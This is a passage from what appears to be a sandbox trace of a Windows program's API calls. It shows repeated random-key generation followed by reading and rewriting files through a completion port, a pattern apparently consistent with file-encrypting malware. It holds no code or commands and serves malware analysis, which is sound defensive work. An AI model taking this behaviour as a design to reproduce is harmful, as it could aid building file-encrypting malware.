pbBuffer=0x35ef970) returned 0x0 [0194.237] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0194.237] free (_Block=0x3e305b8) [0194.237] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0194.237] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0194.237] free (_Block=0x1fa9400) [0194.237] free (_Block=0x77d7a8) [0194.237] free (_Block=0x1fa92e8) [0194.237] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.237] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.238] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.239] CloseHandle (hObject=0x2a8) returned 1 [0194.239] free (_Block=0x3df0008) [0194.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0194.248] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0194.248] free (_Block=0x3e305b8) [0194.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0194.248] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0194.249] free (_Block=0x1fa9400) [0194.249] free (_Block=0x77d7a8) [0194.249] free (_Block=0x1fa92e8) [0194.249] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.250] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x52b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.251] CloseHandle (hObject=0x2a8) returned 1 [0194.251] free (_Block=0x3df0008) [0194.251] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.259] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8032, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.261] CloseHandle (hObject=0x308) returned 1 [0194.261] free (_Block=0x1ff1e60) [0194.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.272] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4732, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.283] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x48cf, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.286] CloseHandle (hObject=0x308) returned 1 [0194.286] free (_Block=0x1ff1e60) [0194.287] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.310] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6818, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.312] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.313] CloseHandle (hObject=0x2a8) returned 1 [0194.313] free (_Block=0x3df0008) [0194.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.316] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.841] CloseHandle (hObject=0x308) returned 1 [0194.841] free (_Block=0x1ff1e60) [0194.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.896] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x33892, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.097] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9a7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.152] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5e35, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.167] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa95d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.193] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.214] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8059, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.215] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.227] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa8b9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.258] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9fed, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.278] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.278] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.278] free (_Block=0x3e305b8) [0195.278] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.278] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.279] free (_Block=0x1fa91d0) [0195.279] free (_Block=0x1fa2ed8) [0195.279] free (_Block=0x1fa90b8) [0195.279] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.280] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x53b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0195.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.281] CloseHandle (hObject=0x308) returned 1 [0195.281] free (_Block=0x1ff1e60) [0195.282] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.293] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.293] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.293] free (_Block=0x3e305b8) [0195.293] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.293] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.293] free (_Block=0x1fa91d0) [0195.293] free (_Block=0x1fa2ed8) [0195.293] free (_Block=0x1fa90b8) [0195.294] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.294] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.298] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.301] CloseHandle (hObject=0x308) returned 1 [0195.302] free (_Block=0x3df0008) [0195.302] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.312] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.312] free (_Block=0x3e305b8) [0195.312] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.312] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.313] free (_Block=0x1fa91d0) [0195.313] free (_Block=0x1fa2ed8) [0195.313] free (_Block=0x1fa90b8) [0195.313] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.313] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.314] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.331] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x6c85, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.333] CloseHandle (hObject=0x308) returned 1 [0195.333] free (_Block=0x3df0008) [0195.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.369] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.369] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.370] free (_Block=0x3e305b8) [0195.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.370] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.370] free (_Block=0x1fa91d0) [0195.370] free (_Block=0x1fa2ed8) [0195.370] free (_Block=0x1fa90b8) [0195.370] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0195.370] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.382] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.382] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.382] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.383] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.383] free (_Block=0x3e305b8) [0195.383] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.383] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.384] free (_Block=0x1fa91d0) [0195.384] free (_Block=0x1fa2ed8) [0195.384] free (_Block=0x1fa90b8) [0195.384] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0195.386] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0195.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0195.395] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0195.396] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0195.396] free (_Block=0x3e305b8) [0195.396] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0195.396] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0195.396] free (_Block=0x1fa91d0) [0195.396] free (_Block=0x1fa2ed8) [0195.396] free (_Block=0x1fa90b8) [0195.396] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0195.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0195.419] CloseHandle (hObject=0x2a8) returned 1 [0195.420] free (_Block=0x1ff1e60) [0195.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: 